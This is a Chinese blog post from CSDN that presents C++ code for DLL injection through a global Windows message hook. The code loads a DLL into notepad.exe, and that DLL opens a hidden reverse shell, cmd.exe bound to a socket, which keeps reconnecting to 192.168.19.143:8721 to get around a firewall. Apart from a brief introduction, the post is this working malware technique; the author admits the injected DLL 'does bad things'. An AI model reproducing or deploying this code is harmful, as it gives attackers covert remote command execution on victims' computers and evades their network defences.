多级线程注入穿墙技术

最新推荐文章于 2023-11-30 08:00:00 发布

小驹

最新推荐文章于 2023-11-30 08:00:00 发布

阅读量983

点赞数

分类专栏：网络安全学习文章标签： null dll buffer winapi stream api

本文链接：https://blog.csdn.net/xiaocaiju/article/details/7552603

版权

网络安全同时被 2 个专栏收录

19 篇文章 1 订阅

订阅专栏

学习

7 篇文章 0 订阅

订阅专栏

主程序调用loader.dll，运行loader.dll中的sethook安装一个WH_GETMESSAGE的全局钩子，发现notepad进程时，loader.dll在钩子函数中加载Insert.dll，insert.dll会做坏事...

下面仅是一些关键代码，不能运行后果自负...

1. 主程序代码：

初始化时：

	// TODO: 在此添加额外的初始化代码
	h_Dll = LoadLibrary("loader.dll");
	if (h_Dll == NULL)
	{
		MessageBox("loadlibrary loader.dll error");
		return FALSE;
	}

执行loader.dll中的sethook函数：

typedef void (*LOAD)(HWND);
	LOAD Proc = (LOAD)GetProcAddress(h_Dll, "?SetHook@@YAXPAUHWND__@@@Z");//获得导出函数
	if (Proc == 0)
	{
		MessageBox("Get proc failed");
		return;
	}
	Proc(m_hWnd);//执行导出函数

主程序退出时，卸载钩子：

typedef void(*UNLOAD)(void);
	UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll, "?UnHook@@YAXXZ");
	if (Proc == 0)
	{
		MessageBox("getproc unhook faild");
		return;
	}
	Proc();
	FreeLibrary(h_Dll);

2. loader.dll

//安装钩子时的回调函数
LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam, LPARAM lParam)
{
	//先向下传递消息
	CallNextHookEx(hHook,code,wParam,lParam);
	//用于防止重复调用
	static bool old = false;

	//获得当前进程的绝对路径
	char buffer[1000];
	memset(buffer,0,1000);
	GetModuleFileName(NULL,buffer,1000);
	
	//如果当前路径中包含要查找的进程名
	char *InsertName = _strupr(_strdup("notepad.exe"));
	char *CurrentName = _strupr(_strdup(buffer));
	if (strstr(CurrentName, InsertName) != NULL && old == false)
	{
		//防止二次加载
		old	 = true;
		HMODULE hDll = NULL;
		hDll = LoadLibrary("c:\\temp\\aa\\Insert.dll");
		MessageBox(NULL,"loader.dll after loadlibrary","ddd",MB_OK);
		if (hDll == NULL)
		{
			MessageBox(NULL, "loadlibrary Insert.dll failed","title",MB_OK);
			return FALSE;
		}
		//获得实际工作的dll的启动函数
		
		MessageBox(NULL,"aaaa","ddd",MB_OK);
		RUN	Run = (RUN)GetProcAddress(hDll, "?Run@@YAXPAUHWND__@@@Z");//?Run@@YAXPAUHWND__@@@Z
		Run(m_hWnd);
	}

	return TRUE;
}


//导出函数:安装钩子
LOADER_API void SetHook(HWND hWnd)
{
	hHook = NULL;
	m_hWnd = hWnd;
	hHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, hinst,0);
	if (hHook == 0)
	{
		MessageBox(NULL, "setwindowshookEx failed","title",MB_OK);
		return;
	}
}

//导出函数：卸载钩子
LOADER_API void UnHook()
{
	BOOL bRet = UnhookWindowsHookEx(hHook);
	if (bRet != TRUE)
	{
		MessageBox(NULL,"UnhookWindowsHookEx failed","title",MB_OK);
	}
}

3.insert.dll

//工作线程
DWORD WINAPI ThreadProc(LPVOID lParam)
{
	MessageBox(NULL,"INSERT.DLL threadProc function..","adf",MB_OK);
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0),&wsa);

	SOCKET sock;
	PROCESS_INFORMATION pi;
	STARTUPINFO si;
	sockaddr_in addr;

	memset(&addr,0,sizeof(addr));
	memset(&pi,0,sizeof(pi));
	memset(&si,0,sizeof(si));

	addr.sin_family = AF_INET;
	addr.sin_port = htons(8721);
	addr.sin_addr.S_un.S_addr = inet_addr("192.168.19.143");

	sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
	MessageBox(NULL,"INSERT.DLL 断开重连前","adf",MB_OK);
	//断开后一直重连
	while (1)
	{
		MessageBox(NULL,"INSERT.DLL while.....","adf",MB_OK);
		sock = WSASocket(AF_INET, SOCK_STREAM, NULL, NULL,NULL,NULL);
		while (0 != connect(sock, (sockaddr*)&addr, sizeof(addr)))
		{
			shutdown(sock, 0);
			Sleep(5000);
		}
		si.cb = sizeof(si);
		si.dwFlags = STARTF_USESTDHANDLES |STARTF_USESHOWWINDOW;

		si.hStdInput = si.hStdOutput = si.hStdError = (void*)sock;

		si.wShowWindow = SW_HIDE;
		memset(&pi, 0, sizeof(pi));
		BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true, 0,NULL,NULL,&si,&pi);
		WaitForSingleObject(pi.hProcess,INFINITE);
		closesocket(sock);
	}
	WSACleanup();
	return 1;


}

//导出函数
INSERT_API void	Run(HWND hWnd)
{
	MessageBox(NULL,"INSERT.DLL run function..","adf",MB_OK);
	hThread = NULL;
	//loader.dll中的句柄会传过来，给它发一个wm_close
	::SendMessageA(hWnd, WM_CLOSE,0, 0);
	hThread = CreateThread(NULL, 0, ThreadProc, NULL,0, NULL);
	if (0 == hThread)
	{
		MessageBox(NULL, "createthread failed","failed",MB_OK);
		return;
	}

}